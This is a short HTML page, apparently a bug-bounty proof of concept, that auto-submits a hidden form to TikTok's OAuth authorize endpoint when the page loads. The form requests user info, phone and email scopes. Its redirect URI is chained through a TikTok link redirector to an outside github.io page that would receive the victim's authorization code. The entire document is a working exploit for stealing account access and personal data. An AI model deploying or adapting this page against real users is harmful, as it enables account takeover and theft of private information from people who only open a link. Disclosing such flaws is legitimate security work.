<html>
	<body>
		<form name='myForm' id='myForm' method="POST" action="https://www.tiktok.com/auth/authorize?client_key=awn32gkr1d27lv49&response_type=code&scope=user.info.basic%2Cuser.info.username%2Cuser.info.phone%2Cuser.info.email&version=1&lang=en&redirect_uri=https://www.tiktok.com/link/v2%3Faid=1988%26%26target=https://huhusski212121.github.io/hackerone/index.html">
        <input type="hidden" name="contentField" value="undefined" />
		</form>
		<script>
			document.addEventListener('DOMContentLoaded', function(event) {
				document.createElement('form').submit.call(document.getElementById('myForm'));
				});
		</script>
	</body>
<html>
